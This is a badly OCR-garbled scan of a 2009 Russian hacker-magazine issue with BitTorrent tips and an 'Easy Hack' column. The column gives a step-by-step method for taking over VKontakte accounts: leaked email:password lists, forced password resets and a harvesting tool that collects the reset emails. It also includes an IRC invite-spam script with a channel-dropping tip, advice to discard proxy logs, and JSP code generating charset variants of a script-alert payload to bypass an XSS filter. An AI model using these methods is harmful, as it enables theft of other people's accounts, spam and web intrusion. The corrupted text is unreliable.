. www.totaldvd.ru

в продаже с

24 июня

ДЕСЯТОК CEKPE~OB

о КОТОРЫХ ТЫ НЕ ЗНАЛ

:

Скачать «горяченький» файл -

подчас не такая простая задача.

Обычные хостинги мрут, как мухи, не выдерживая нагрузки, файлоб­ менники жадно клянчат деньrи, а FТР-серваки не дают слить файл из-за ограничения по количеству пользователей. И только через

BitTorrent можно не только закачать вкусняшку, но и сделать это мак­ симально быстро. Еще большего удобства ты добьешься, воспользо­

.

вавшись нашими советами



Сегодня мы не будем говорить о банальных

скачать только через tоггепt. Такие фай~ы

способ проще. Слить нужный файл черезторрент

~. Новые серии сериаловтеперь под силу

обычно по разны;~ причинам быстроудаляются

подсилуодному лишь браузерувкупес онлайн

даже домохозяйкам, по картинкам установив­

с ХОСТИI~ГОВ и файловых обменников. Да и просто

инструментом BitLeHv"""i'V.bltlel.orgJ. Это очень

шим какой-нибудь торрент-клиент. Намного

обезумевшая свора пользователей нередко

ПРОстой сервис надолишь скопироватьлинк

интереснее разобраться, какуправлятьзакач­

вал,псервер или полностью расходуетеголимит

ДЛЯ торрента в единственное на странице поле,

ками с мобилы, получить аккаунты на приватных

потрафикуу хостера. Дома ничто не мешает

нажать на кнопку

трекерах и автоматически скачивать свежие

воспользоваться любимым клиентом (напри­

брать папку для сохранения файла на локальном

дистрибутивы программ. Вот эти м и зай~~емся I

мер, uTorгentl, но сам лично не раз стал кивался

диске. В большинстве случаев, началозакачки

«Download torrent" и далее вы­

с ситуацией, mгда файл кровь из носа нужно

не заставит себя долго ждать. Секрет работы

ОБХОДИМСЯ БЕЗ КЛИЕНТА

было скачать из совершенно левого места. Как

сайта в специальном Jаvа-апплете, который и

Все чаще начинаю замечать. что некоторые

вариант, на машине можноустановить порти­

выполняетфункции Тоггепt-кгиента Но отсюда

эксклюзивные вещи становится возможн ым

руемый кгиент. которых большинство, но есть

же возникает и единственноетребование. необ­

~

034

ХАКЕ'Р

.

06 /126/ 09

)

'О.'О

~,iltl

...

@/(;->==­ .I~

-. =--­ ._0 :.

.. .

.

изтор­

РЕНТОВ ПРЯМО ЧЕРЕЗ ЛЮБОЙ ВРДУЗЕ::Р

~

-

--­ ,..

."

-::;. ю,.

""

"",~

-:'..

...

-:='";;;;;;;';­

,"'.~

~;...,:..-­

1:':: 1-­ ;­

г----------------------il 'l ! ходи~ю позаботиться,чтобыдnятвоего браузера

бып установпен плагин Java VM.

ТВОЙ ИН­

•• РЕГИСТРИРУЕМСЯНА ЗАКРЫТЫХТРЕКЕРАХ

ВАИТ НА ЗАКРЫТЫЕ TPEKEPbl

Ни для кого не секрет, что дnя регистрации на закрытых торрент-трекерах нужны инваЙты.

Имея не очень широкий канал, мне удобнее

Взять хотя бы легендарный Demonoid Только

закачиватьфайлы в момент моего отсутствия

где эти инвайты взять, еслv.друзья о таких

регистрироваться Кстати говоря, дпя обмена

сервисахдажене СllышаllИ На самом деllе,

инвайтами есть даже специаllизированный

ми приходитсяудаllенно. Конечно, ничто не

попностью приватнытреJсерыы- большая

ресурс - wwvueroRaid.com.

ограничивает в ИСПОllьзовании обычного

трекеров открывают свободную регистрацию в

РАБОТАЕМ БЕЗ ТРЕКЕРА

привязанным к компьютеру. К счастью, есть

опредеllенные дни недеllИ v.ли даже оnреде­

Увы. но трекерызачастую оказываются недо­

способ вообще избавиться от каких-либо

пенные часы. Уследить за этим довольно

ступными. Крупных и извеСТНЫХТр9.сутправо­

ограничений, установив для своего клиента

обладатели, неБОЛЬUJие и при ватные банально

веб-интерфейс Одним из самых распростра­

метод вручную заходить на сайт 8 надежде,

оказываются недоступ ными из-за проблем с

ненных вариантов является связка нашего лю­

что вот-воттам откроется регистрация. Не

хостингом. Сам протокол BitTorrent подразумевает

бимого uTorrent и специально разработанного

буду говорить по поводу того, ЧТО можно на­

обязатеllьноеучастиетрекера, но клиенты разви­

веб-интерфейсаWebUI [htl[J//lогum.Ulоггепt.

писать простенький скрипт. КОТОрЫЙ сам все

ваются настолько быстро, чmуже сами придумали

com/vie\'IIforum.ph[J?id=20J. ДIlЯ установки надо

автоматически будет проверять Но нескажу

дополнения для протокола. Так что Кilиенты могут

лишь распаковать архив с ПОСllедней версией

лишь потому, что уже давно сделали за нас

работать вообще без трекера. Если в опциях

WebUI прямо в папку u Тоггепt'а и далее ВКIlЮ­

R РD-клиента, но 1уТ ты опять оказыва ешься

редкость. Многие изтаких вот закрытых

тяжело, муторно

-

в КОl1це концов, не наш этот

дома Поэтому зачастую управпять закачка­

программы естьуказание на DНТ -считай, так

чить

\Nvvw.o[Jentrackers.lr. Первый очень простой:

оно и есть. DНТ [DistribuLed Hash ТаЫе. распре­

руешь веб-клиент соответствующей галочкой,

скорее всего, какой-то rv.K

деленная хэш-табllицаJ работаетдnя разных

тебе предложат ввести логин

р2р-технологий, но конкретно Кilиентам 8itТоггепt

ДОС1упа, сделать гостевую учетку, а также за­

позволяет обойтись вообще без трекера. Ины"и

дать порт, на котором клиент будет принимать

создатели сервисов

Trackerchecker.org и ero сделаll для себя,

а после OTKpbIll для всех желающих. Совсе" другое дело

- opentrackers. Тутты не только

ero в настройках. После того, какактиви­

v. парольдля

можешь узнать о состоянии регистрации

словами, Кilиент сможет найти nИРОВ,даже если

подключения

нужныхтебетрекеров[а заодно и открытьдля

трекер отключен или даже никогда не существо­

чтобы обратиться к веб-интерфейсу, доста­

Вот, собственно, и все: теперь,

себя кучу новых], но и посмотретьконкретную

аал. Кроме топа, l'Oрренты можно размещать без

точно набрать в адресной строке httр//<твой

статистv.купо каждомуv.з них, А чтобы не про­

трекера. Утакого развития Кilиентов есть и ложка

'р>.<указанныЙ в настройках порт>/gUI/

пустить «счастлv.выечасы", тебе предлагается

дегтя. в виду отсутствия стандарта нет единого

Неважно, откуда ты будеwь попьзовать веб­

подписаться на общий для всехтрекеров

понятия 01"ОМ, какдолжна выглядеть таблица

v.нтерфеЙсо", неважно какой браузер будет

RSS-фид,либо на фид по KOHKpeTHO'~yресурсу

DНТ В результате, в нашем любимом ~Тогneпl ис­

использоваться

Если присмотреться,то рядом с наиболее по­

пользуется та же реализацv.я DНТ. что и в МаiП\lпе

можешь хоть через мобv.льныl~ браузер теле­

пулярнымитрекерами есть небольшая иконка

и BIIComet, но, увы, несовмесгимая с Azureus. В

фона [npoBepeHo на Opera Мiпil Не эабудь

[например,у Demonoid'a v.IlИ f'ileList orq), по

любом случае, поддержкуDНТ в своем Кilиенте

пробросИ1"Ь порты, если используешь маршру­

которой можно перейти на сайты для обмена

необходи~ю ВКilючить в обюательном порядке.

тизатор и разрешить входящие подключения

приглаUJеНИ>lМИ Обычно эти IlИНКИ ведут на ветки каких-то форумов, поэтому для запроса приглашения придется предварительноза-

УДАЛЕН НО УПРАВЛЯ'Е~М

ЗАКАЧКАМИ ЧЕРЕЗ ВЕБ

-

управлять закачками ты

для нужного порта в фаЙрволе. Для большего удобства реко,~ендую обзавестись записью

в каком-нибудь DупDNS-сервисе (например, dуПdпs.соm], чтобы вместо своего IP вводить что-то mоilоггепt.d пdПS.соm.

Несколькополезных

Должен признать, что последняя версия WebUI

сервисов

вышла еще в 2008 году и содержит HecKollbKO

• Сколько раз, скачав довольно большой файл, ты обнаруживал, что этот вовсе не во­

проектбез развитv.я долго оставаться не мог.

неприятных ограничений

Впрочем, такой

жделенная программа, а какой-то непонятный фейк? Врядли многим приходит в голову

Сейчас активно продвигается модификация

просто нагадить, а вот поднять рейтинг за счет якобы ценного файла горазды многие.

WebUl WIP, версия для удобного просмотра с

Огородить себя от подделок просто: достаточно предварительно проверить подлинность

мобильных устройств u Тоггепt МiпiUI, а также

файла, скормив его хэш (а он обязательно прописан в .tопепt) специальному сервису ­

ряд других проектов. ссылки на которые ты

\\'\ \'\~JSlI1·_ellrsp.1 т. (0111 .

найдешь в сноске.

• Инструментовдля удобного поиска по торрентам рунета не так много. Зато есть за­ мечательный сервис Baratro (I):I!" 11', '. ПJ), которыйИНдексируетторрент-файлы со многих

JABBER И BITTORRENT

друтихтрекеров,в том числе и закрытых,и предоставляетвозможностьбыстроискать

Конечно. веб-интерфейс - зто вовсе не

нужные файлы, забыв о проблемахрейтинга.

уникальная фишка uTorrent. Если говорить о популярном никсовам И маковском Кilиенте

ХАКЕР

06/126/09

I~

035

г::=~::::-;;~~-~ 00" ~ ".'''~'.-.----------=

L~L"--~ll

~~...

))(~~ :-6~;

;:::

=

~-~-.~~~:-~~-.~~~.;,,..,s. 5:..\3.

$'StfII. СЭIOOJl

5-..

~

. '

. • •

.

~ ~

~.:: ~~~ ;:-~)~ ::~ l.~JGI) ~т.!CZ;

~A'"

m.~,.

~

::6..~~~1S

:O:n~.,.

Sor~

s.,;Of,W

"-'О.G'to

..

!'!А --~;;,;-___;:;:..-­

'

warning

Несиотрянадурную славу,

-

BitTorrent

это лl-tшь распре­

деле), ная сеть для

обмена Файламl-t_

URЕМОТЕПОЗВОЛЯЕТУ~АЛЕННQУПРАВ­

Но надо ПОНИ'1аТЬ,

• •• •

что, l-tспользуя его для загрузки вареза

или пиратской вер­

ЧТОБЫ НЕ КАЧАТЬ ВСЕ ФАЙЛЫ ИЗ RSS­

сии фильма,

ФИДА, НАДО НАСТРОИТЬФИЛЫРЫ

ты нарушаешь закон.

KOef1





подписку В общем-то, большую часть работы в этон случае выполня ют сами ресурсы, которые генерируют контент для этих

Автор и реда кцl-tя зто НИ В



ПЯТЬ

самых фидов Особенно часто 8стречаются RSS-фиды с еже­

случае

недельнымl-tтелевизионными программами l-tли сериалами,

не поощряют.

Тгапsmlssiоп (httр:!IWVffl.tгапsmissiопЫ.соrn].ТОдЛянего

закачкукоторых как раз и хочется автоматизи ровать. Лезть на

разработа н не менее впечатляющий веб-l-tнтерфейс

сайт за каждой новой серией тупо леl-1Ь, Зато подпl-tсаться на

€)

(httr !/cod e,I'ecLJrsel'.com!wiki/clLJtchiAboLJt!. Семимильн ы ми

нужный RSS-фl-tд через торрент-клиентне сложнее, чем просто

ша га м l-t развивается кросс-платформенная ПРОГРЫ1ма

добавить новую закачку. Соответствующий пункт меню есть

~

Deluge

Ideluge-tоггепt.огgJ, у которой также есть подобная опция. Тут

практически во всехсоsременныхторрент-клиентах.

надо отдать должное разработчикам, создавшим открытую

Возникают вопросы, когда для доступа к подписке требу­

систему

dvd

CILJtch

и без того широкl-tе возможности клl-tента можно

-

ется НТТР-аутентификация, Если использовать

uTorrent,

как угодно расширитьза счетплагинов, также, каки ca,~a

то формат URLдля подпl-tски должен вы глядеть так:

На диске ты найдешь

программа, написанных на

На официальном сайте

логин :парольraнекий-тоggент-саЙт.соm/гss.рhр,ИЛl-t

все упомянутые

естьоднолюбопытное дополненl-tе

RemoteNotify. которое

друrой вариант - снарядить клl-tент нужной cookie

в программе утилиты,

отправляет сообщен ия оэавершенн ыхзагрузках на любой

а также дополнения

Jabber ID

к Hl-tМ.

-

Python

Однако на,1НОГО интереснее другая ее возможность

управленl-tе Тоггепt'аМl-t с помощью простых команд череэ

Ilttg:/i

k U ID и

паролем на нужный TpeKepl8oTTaK: httр:l/некиЙ-торрент-саЙт.соm/гss,рh р С О О КI E:ui d-O 1'gas s~(jwertysdf354scdfg2

JаЬЬег-сообщения. Можно отправить своему кл иентусообще­

Если говоритьо uТоггепt, то грех не воспользоваться встро­

ние вроде «add hltр:/illПklllпk» - l-t DеlLJgедобавит новую

ен ной системой фильтроs, которая настраl-tвается через

закачку.IМ-КЛl-tентееть практически у каждого нателефоне,

Downloader [вызывается горячей кнопкой Ctrl-RI Для каждого

и почти все они, помl-tмо пресловутой

фl-tльтра можно указать словосочетан ие, которое должно

aCbKl-t, начl-tнают

под­

держивать множество других протоколов и, конечноже,

Jabber

RSS

sстречаться или, наПРОТИ8, не 8стречаться, причем допуска­

ются служебные сим волы' и *, приоритет AJlЯ Н08ЫХ закачек

ПОДПИСКА НА ТОРРЕНТЫ ПО

RSS

и папку для загрузок. Важно, что тут не l-1аАо указывать номер

Самый классный способ автоиаТЮl-tроватьэакачку некоторых

серии илl-t сезона lопятьжеупор на эакачкуименно cePl-tалов),

файлов

Т;С это нарушит работу фильтра. Для указан ия этих параметров

-

подгружать ссылки на tоггепt-фа йлы через

RSS­

ес,ь отдельное поле с конкретным шаблоном, рядом же можно

НАСТРАИВАЕМ ШЕЙПЕР: ТЕПЕРЬ ПОЛНАЯ ШИРИНА КАНАЛА БУДЕтдоеТУПНАUТОRRЕNТТОЛЬКОГЛУБОКОЙНОЧЬЮ

. . G.......1

rjг­

UI settings

!-·DitectQries

, 1·- Connection

I 1·- Вand",dth

1

~Scneduler ;-.. \~,reb ur

I (~-

Adv.nced

И все-таки. получается довольно-таки огранl-tченная автоматизация:

мы напрямую зависим отех, кто соэдает

RSS-фl-tды. Что делать, еСЛl-t подписки для интересующего



нас контента банально нет' Вот тут-то нам и поможет уже

знакомый инструментУаhоо Pipes [pipes,yar,oo.cQm], Этот

o Еn.ы. S<:h.dul.,.

замечательный сервис позволяет обрабатывать раэличные

Schedulerl'O!IbIe

источнl-tкl-t данных [RSS-фиды, любые HTML-страl-JичкиJ,

~ 8itTorтent"

!." QUfue:ing

указать и требуемое качество IDVDRIP, Н DТV итд,!.

фильтровать полученный контент, выделять из него нужные

I

I

данные и получившийся поток информациl-t оформить

I

8

виде обычного RSS-фида. А поскольку настройка «водо­

I

провода» выполняется с помощью графl-tческого l-tнтер­

фейса, то можно очень быстро сварганить готовую подписку

I

DTumoff [;JLimit~

О Seeding only

S
r~te (kВIs):

dO·....ТlloO!ld

I------------~~---­

r~te

(kB/-s):

o OisO!lbIe ОНТ whEn tuming off

с совершенно любой l-tнформацией, в том чl-tсле И ссылка'1И на интересующие тебя торренты. То, откуда ты l-tХ будешь брать и по KaKO~~y Прl-tнципу отбирать, зависиттолько от

тебя. Ч-roбы быстрее BHl-tКНУТЬ в водопроводные дела, реко­ мендую тебе статью "Интернет на ОДНОЙ странице» из

номера I

11 О

(РDF-версия будет на нашем дискеl.

АВТОМАТИЗИРУЕМ ЗАКАЧКИ Есть еще несколько способов автоматизировать за­ качки. В том числе и на удаленной иаШl-tне, Напрl-tмер,

~ 0з6

ХАКЕР

06 /126/ 09

Q(@)@J

.}

!orrent ~dit yie\y



';::::: , 1 v

C{F

I~~--._--.J

~

~~,-~~,

tO.....""""

Pгopeгties

Remove

'~

Active QOYJnloading S,eeding faused

D

~,~.b'I'

G&

00 Pause

Start

Add

:O't!'.ti'

.!ielp

kuЬuпtU-9.04-dеsktор-аmdб4.isо 694,7 МВ, uploaded 3103 кв (Ratio: 0,00)

Seedinq 10 1

LJ

ОГ

1

со,щеСlеd реег· ир;

0.0 KB/.

Question Copyright - Sita S;ngs the Blues • 616,7

I~B

480р

SD

01 1,4 GB (44,10%)·1 hour ren,.ining

DO\l'mloading froгn 3 of 4 connected peer;·

~R·~·~~РУБАдЛяГРАББИНГАЛИНКОВНА СВЕЖИЕ СЕРИИ ПОПУЛЯРНОГО СЕРИАЛА

Dоvщ:

218.2 K8{s

. ,

1,·

очень удобно на хоете с широким канаnом и работаю­ щими tоггепt-клиентом расшарить папку И сделать так,

з Toггents

чтобы прога автоматически подхватываnа 8се ПОЯ8ЛЯЮ­

~ Ratio: 0.04

TRANSMISSION ДЛЯ

щиеся там ,tоггепt-файлы Помнится, в С80е время Я

.. 1.72 MB/s

.. 180.9 KB/s

МАКА И ТУКСД

даже ПViсаn простенький Регl-скипт. который запускаnся каждые пять минут через пnанировщик I~

проверяn пап­

ку на обновление, скармливая появившиеся торренты на

мапо, В России трафик чаще режут на уровне организации,

скачку кnиенту Доступ к зтой папке был у моих друзей, и

чтобы сотрудников не сипьно баловать халявным инетом,

они очень просто могли 80СnОnЬЗ0ваться моим каналом,

Обойти такие ограничения не просто. но можно, Достаточно

просто скопировав в эту папку нужные торренты, а потом

очевидный способ

спить закачанные файлы по специально открытому для

могли разобрать, какие данные и каким образом переда­

них ПР,

ются пользователем, Трафикдля этого можно пустить через

Чуть позже ПОЯ8ИЛСЯ дедик на винде и оказаnось, что

шифрованный туннель, но это зачастую дорого [например,

- сделать так, чтобы провайдеры не

автоматизировать это можно прямо средствами uТоггепt,

в сnучае nnaTHoro VРN-сервиса) иnи медленно [в случае

• о том, как само­

Надо лишь в разделе "Другие настройки» включить опцию

беспnатного варианта на базе Toro же Тог'аl Однако в

~~y поднять С80Й

«Автозагрузка файnов .tоггепt» и задать папку для загрузки

нашем сnучае необяза-rеnьно решать пробnем «в лоб»,

торрент-трекер, ты

Правда, по умолчанию клиент наЗОЙnИ80 будеттреб08ать

Возможность шифрования трафика на основе простого

~~ожешь прочитать

путь для сохранения закаЧи8аемых фаЙЛ08, но и зто можно

апгорип~а

8 #114у

побороть, указав нужную папку

протокопа IPгotocol EncryptlOn], впервые реапизованное

статьей мы выложили

мыефайлы в», Чтобы не спутать старые файnы с новыми, все

в проге

на диске,

обработан н ые торренты

г,рапически всеми клиентами и включается без лишнего

8 попе "Помещать загружае­

uТоггеп! помечает расши рен ием

RC4

появилась в самих кnиентах Шифрование

BltComet еще в 2аО5 году, теперь поддерживается

POF-куСО

геморроя устаН08КОЙ нужной галочки в настройках, Если

• Раз уж мы за 1'080­

взять UTorrent, то шифр08ать трафик он умеет 8 нескольких

рипи о веб-оболочках

ОБХОДИМ ЗАЩИТУ ПРОВОВ

режимах. для всех подключений, только для входящих,

для упра8ления

Колоссальны й объем трафика, про качивае~шй через

тоnько для исходя щих И Тд,

закачками, не могу

BitTorrent, конечно, не СИЛЬНО нравится провайдерам,

Реально обойти и другие ограничения, Если корпора­

не упом~нуть раз­

В н екоторых странах п ровы охотно начина ют бороться с

тивный файрвоn режет трафик по конкретны м портам,

работку

р2р-сетями и ограничиваютсоединения, ссылаясь на то,

то в кnиенте можно попробовать установить другой порт.

[torrentflux,com]

что через торрент [8нимание l ] может передавать варез,

В конце концов, тот же

Это торрент-клиент,

Отмазка, конечно, неплохая, но ПОЛЬЗ08ателейутешает

прокси или саксУ

,torrent,Loaded,

uTorrent отлично работает через

TorrentFLux

который поnноетью написан на РНР и довольно просто уста на вл ива ется на

LАМРхоетингпод никсами

• Привыкнув К

uTorrent'y, сложно

перейти на альтерна­ тивные кnиенты под

другими ОС Приятно, ДМ это й програ~~­

мы уже сейчас есть бета-версия под Мас

05, а

под туксом она

отлично работает под

эмулятором

ХАКЕР

06 /126/ 09

Wine,

~

037

»

в=:лом

Easy Hack

Easy Hack

ХАКЕРСКIИЕ СЕКРЕТЫ ПРОСТЫХ

Eas Hack

ЛЕОНИД

"ROID" СТРОЙ кОВ

I RDIDraHAIL,RU I

ВЕЩЕЙ

АНДРЕЙ "SKVOZ" КОМАРОВ

MORO

I KOHAROVra ITDEFENCE.RU I

I HOROraINBOX.R.U I

ЗАДАЧА: ПРОЧЕКдТЬ СПИСОК

МЫЛЬНИКОВ НА НАЛИЧИЕ АККд­ УНТОВ «ВКОНТАКТЕ»

§'@БМIН"ММ

f~~:'- _1~_~_:_J~_~ Ц_ш._-_-~ _~ _-oi-'~

РЕШЕНИЕ: Социальные сети с каждым днем набирают все большую популярность.

I

Поэтому я даже не буду сп рашивать, зачем тебе могут потр ебо вать акки,

Сбор паролей от «ВКонтакте»

на пример, от \N'N'N.vkonta I\te.ru:) Собрать пару сотен подобных уч етн ых за­ пиceй зачастую просто необходимо, но как быть, если на руках имеется лишь

2.

внушительный маил-лист вида МЫЛО.пароль, который необходимо преоб­

ника

В~6ираем список вида мыло: паропь, где паропь

-

пасс от м:ыль­

разить в список ТИ па логи н :пароль ОТ "ВКонтакте» 1 Ре шение есть, и сейчас

з.

':IeKael'1

ятебе его представлю. Для осуществелния задуманного мы воспользуемс~

4.

Валидные МЫПЬНИКИ чекаем на наличие акков <'<ВКОНТакте)о)

утилой

5.

Ждем

MailWok,

которая предназначена для проверки мыл на наличие акков

"в Конта кте», а та кже для автоматического восста новления па рол ей и их

мыльники на валид

HeCKOJJbKQ

l"4И.Н)"Т

(пока на мыла рассыпаются письна С JЭос­

СТдновлеННЫJoВ1 пассаии от социальной сети)

сбора с прочеканных ящиков. Прежде чем перейти к активным действиям,

б. Теперь жнем на баТТQВ <~Проверить мыла» и Бдем,

рассмотрим возможности софтинки:

соберет с ЯЩИКО8 письма

7. •

'Чекинг мьш на наличие аККОБ «ЕКонтакте»



Автоматический запрос на восстановления пароля от аККдунr:rа

I

пока тулза

пришедшие ОТ «ВКонтакте»

Сохраняем полученные акки

Теперь о возможных проблемах l Если пасс от "ВКоптакте» не пришел, зпачит:

«ВКонтакте»



Автоматический сбор писем с паролян:и от «ВКонтакте» с проче~

1.

Мыло не лрочекано на валид либо невацидаое

канных ИЫЛЬНИКОВ

2 •.~·jылО



з.

Автсиатическое удаление собранных. пиоем с носетановпением

не эарегано «БКонтакте»

AKKaYf':T

«Вl(oH'I'aKTe»

зареГYiстрирован,

но не активироsан

пароля



Поддержка ПОП'.fлярных почтовых сервисов

{mail.ru, rambler .П],

Как видишь, все довольно просто, но зффективно целую 5Д с учетками от

Если ты до сих пор не понял, о чем речь, то имеетсмысл ознакомиться с под­

робным алгоритмом действий по решению поставленной задачи:

Однако не забывай, что за все свои

запрещено.

нашем ДВД ты найдешь нетолько утилу

MallWok, по

и сорцы, которые

были любезно предоставлены автором продукта

Слушаем уТ'илу с нашеrо двд

ЗАДАЧА:

w\I'iw.vkontakte.ru.

действ и я ты отвечаешь сам, а испол ьзо ван ие '1ужих аккаунто В кате гор ич ески

P.S, На 1.

При наличии времени,

желания и большой базы мыльных акков ты запросто сможешь собрать

уапdех.ru, есс)

НАБРАТЬ БОЛЬШОЕ ко­

Л ИЧ ЕСТВО ЛЮДЕЙ НА I RC-КдНАЛЕ

Обрати 8нимание.

При превышении лm-штов инвайтов следуе1' переподключиться

РЕШЕНИЕ: Если ть! фанат

iRC,

Не Стоит собирать ники со служебных каналов

то раскрученныL:\ капал С обилием народа, ДЛR тебя­

дело '1ести. Воттолько собраl'Ь внушительное количество людей не так-то

жизни

TBOe'I'O

(иначе минуты

канала сочтены}

При желании дропнуть чужой канал

просто Можно, конечно, рекламировать свой IRС-канал всеми возможными

-

достаточно rrpо:инвайтить

ники со служебlШХ каналов

:)

способами, однако есть гораздо более эффективный метод, о котором я тебе сейчас расскажу. Суть его заключается в автоматической рассылке

Пла вно перейдем к установкескрипта:

ин вайтов и попол не нии численности ка наЛОflдселен ия за счет в ключен­

ного автоджойна при получении инваЙта. Ка к ты понимаешь, речь идет об

1.

Сливаем скрипт с нашеrо ДВД

автоматизированной доставке приглашений, поэтому знакомься -«Invlte

2.

О'гкрываен mirс-редснстор СКрИПТОВ

т;гс script Ьу elimS". Именно он поможет нам осуществить задуманное. Итак,


начнем с описания функциональности скрипта.

! _ _.__

_...•:=::J

з. СОЗДд.ем новый Сl\РИПТ



содеРЖИМbh"j

нужного нам скрипта "Iпv~tе



Автоматический сбор ников



Автоматическая рассылка инвайтое

(aka

mirc scripc

Ьу

elimS" ) Скрипт автоинвайтов

----------------------------------------~----------+­ ХАКЕР

06 /126/ 09

» Далее необходимо сконфигурировать скрипт Для этого:

которого следует собирать ники

4) 1.

Выбираем наш СlФИ"'"

2.

В параметрах Уl(аэывае,,:

1)

Канал

2)

Частота инвайта

секунд)

.

-

(н" '!'вое усмотрение)

На кого будет действовать СКрИilТ -

отмечаем тех, кого СОGИ­

раемся инвайтить (ОПОВ не брать,))

5)

цифра в милисекундах

(1

Инвайт ИЗ Уl<азан:tiого ник-листа

TBer.Horo

канал, на который будем приrлашать

-

В::ЛОМ

секунда

= 11(

мили­

Не .забудь, '{то на каждом сервере существует свой лимит

инвайтов по врем€:nи, поэтому не жадничай и :{казывай не менее

ИСПОПЬЗОВд:lие твоего собс­

-

н",к-писта для р"ссыпки инвайтов

6) НИК-ЛИС'Т' :ИСJ<лючений ­ перечисляем НИКИ, KO'l'OPbl€ не будем лриглаШд:ТЬ

на канал

2 СЛО80М. если ИРЦ ­ неотъемпемаR часть твоей виртуальной жизни, смело

секунд.

З) Величина канала

-

:минимальное количеС'Т'ВD людей на канале

t

С

СЛИ8ай СКР'1Птс нашего диска.1 приступай К раскрутке собственного канала.

ЗАДАЧА: УСТАНОВИТЬ И НАСТРО­

Web

Obrazky

Video

JCQ.c:om

Lide

итыаснАтT РЕШЕНИЕ:

•.•

Номе

3 одном из прошлых выпусков:У.: мы

выкладывали на нашем диске

_ _. . . . .

m"lт1 p1iT'

замечательную софтину ICQChal Но подробный мануал по настройке тулзы ОТСУТСТ80вал. что вызвало немало вопросов. ЧТО Ж, пришло время

[aJ

"справить досадное недоразумение и расста8ИТЬ все по СВОИМ местам

;';перЕа сформулируем план наших действий'

1.

Смена паропя от аднинки бота

2.

Смена дефоптного порта "ДМИНКИ

Bгoken

Been in

HeOt1s GI'OUP b~d

relationship1

&eon che&ed .snd/or lied to Ьу

Включить/Отключитьадминку

3.

O!II

Chat Rooms

lоехали J Для того чтобы сме нить адм инский аккаунт, нам необходимо:

Юзаем ICQChat

Зайти в папку с ботом Найти файл

j irnbot . хт1

Отредак'Т·ировать строчн:у с ЛОГИНОМ:



О''Гредактировать стро'!ку с паропе",

- true,

отключение ­

fa1se

Пора перейти к настройкам чата. Рекомендуюобратить внимание на

user" rel="nofollow">admi.t1< /entry> •

В"ЛЮ'-Jение

<ent.ry key:::: "http. <епcrу

\ey="http.

следующие параметры:

раSS">аdmiп число переподключенийдвижка при обрыве:

1. Теперь сменим

дефолтовый порт админки. Для этого:

Пауза ДЛЯ входящих сообщений:

Пауза ДЛЯ ИСХОДЯЩИХ сообщений:

Заходим в паПJ.<У с ботом Ище!<1 файл

Ограничение очереди исходящих,

jhttpserver.proper:ies

500 2О

Пауза перед "ереэапуском коннекта:

Редактv.руем строку с указанием порта:

port=8888

Чиспо повторов Фпуда: Период фпуда

Сохраняем изменения

(сек):

660000

5

10

Пауза сообщений ДЛЯ незареганых (сек)

~. Если ты реш ил отключить адм и н ку. тебе следует:

ЗадерЕка очереди чата: И многие другие

5

1000

: 20

10000

,)

Зайти Б папку С ботом

Найти ф"й.~

Вот и все. Надеюсь. проблем с дал ьне й шей эксплуатациейчата утебя н е

j iшЬоt. хт1

Отредактировать строку, kеу=»mаiп,

StartHTTP»>tJ;ue<

возникнет

ЗАДАЧА: УСТАНОВИТЬиl сконфи­ ГУРИРОВАТЬ ЗРRОХУС ПОДДЕР­

жкой SOCiKS5 РЕШЕНИЕ: Саксы нужны всегда и 8езде:l­

ОДН им ИЗ лучш их соке-серверов по пра8У считается Зргоху ПОЭТОI~У сейчас мы подробно рассмотрим его установку из портов на базе ФрRХИ

Устанавливаем 3ргоху

ii cd !USJ;!poJ;ts!netl3proxy/

# make instal1 09

ХАКЕР

06 /126/ 09

с1еап

~

039

»

Е:~ЛОМ

'---+--------------------1'----------.-.-----------------;---­ Еаsч

Easy Hack

Hack

Далее откры вай м но гострадал ьны й конфиг Эр roxy.cfg и редакти руй по-своему

Теперьсоздаем конфиг:

усмотрению [прv.мер правильного конфига ищи на

#

ер

/usr /10саl/еtс!Зрrоху,cfg _samp1e /usr /lоса1/еtс!Зрrоху.cfg

При необходимоcrи - пишем логи в созданную диру:

DVO).

Все, установка закончена Запусхаем Зргоху на сервере в качестве дe~~OHa:

ff /usr 1l0calletc/rc. d/3proxy start Хттп-прокси И сокс-проксикК твоим услугам - пользуйся и не забывай про

# mk:dir /var 110gI3proxy

лог и Вообще, peKOMeHдyeTC~ пускать вселоги по прямому назначению - в/dеv/пull

-1.

J

ЗАДАЧА: 060ЙТИСАМОnИСНУЮ

-

СИСТЕМУ ПО ЗАЩИТЕ ОТ XSS, УСТА­



НОВЛЕ:ННУЮ ЗЛОБНЫМ АДМИНОМ ror(1ong i=O; i< Ох100; '+~)

РЕШЕНИЕ: Тебе предстоит найти вариант, который заэедомо не предусмотрел

long

администратор. Обычно все админы руководствуются общедоступным

.long gt



ОХ3С;

=

= Ох3Е;

=i

списком наиболее популярных сценариев с сайта ha.ckel·s.org/xss html

long order

[Cross Site Sсгiрtlпg Cheat Sheet] или используют какой-либо модуль

longLT=order 11t;

« 8;

безопасности. Отчаиваться не стоит - лучше попробовать заюзать так

l/оt1t.рrlпt1п(Lопg.tонехStrшgIL"l'}

называемые «fогеigп

lопg

charsets».

Примерныедействияследующие:

": ");

GT = order I gt;

1. Смотри следующий НТМ L-код, который позволит сгенерировать 256

//ОUL_рriпс1п(Lопg.tоНехStriпg[GТ)+

вариаций для организации преодоления фильтра:

String theScript

= {сhаr)JЛ

"
");

+ "script" + (char)GT + "a1ert("

+ i + ");" -+ (char)LT + "/script" t {char-JGT;

<%@ page language=" ja',a"

сопtепtТуре="teXt/html;

Оис

,print 1п ( theScript + "
");

сhаrsеt=ПТF-8"

раgеЕпсоdiпg~"ПТF-8"%>

<%@page

iшроrt="

org . apache.

сошmопs. lal1g. StriлgЕsсареUt.ils'1

%>

%>

<JDOCTYPE htm1 PUBLIC "-//I!I3C//DTD HTML 4.01 Transitionall/EN"



''http://W'I'''' .,.3. orgnR/htro141l00se. dtd" >





2. Попробуй

распечатать результаты исполнения скрипта. Возможно,


ты увидишь, что не все l1З символов будут корректно отображаться как

charset=UTF-8">

на бумаге, тгк и в браузере. Причина - использование специфических

